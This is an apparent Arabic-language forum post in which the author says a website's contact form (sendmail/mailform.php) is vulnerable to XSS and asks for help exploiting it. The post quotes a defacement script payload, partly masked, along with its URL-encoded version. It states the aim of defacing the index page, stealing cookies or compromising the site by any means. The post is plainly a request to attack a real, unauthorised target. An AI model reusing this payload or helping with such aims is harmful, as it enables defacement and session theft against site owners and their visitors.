xss

السلام عليكم .. كيف حالكم
معي موقع مصاب بثغره xss اخر الرابط على هالشكل sendmail/mailform.php
طبعا فيه مربع ترسل فيه اقتراحات او شكاوي
جربت الكود الي وضعه الاخ سايبر مافيا عشان اعلق اندكس ولا تعلق الاندكس لا على المجلد ولا الصفحه ال php ولا له اثر بالموقع شفرت الكود url برضو ما ضبط وش الحل
شوفو هذا كود الاخ سايبر
******************.********Element.innerHTML="<h1> good security Hacked by me</h1>";</script>
وهذا الكود مشفر
%0A%20%3Cscript%3E********.********Element.innerHT ML%3D%22%3Ch1%3Egood%20security%20Hacked%20by%20me %3C%2Fh1%3E%22%3B%3C%2Fscript%3E%20

ايش الحل ابي ارفع اندكس او اسرق الكوكيز او اخترق الموقع باي شكل
جزاكم الله خير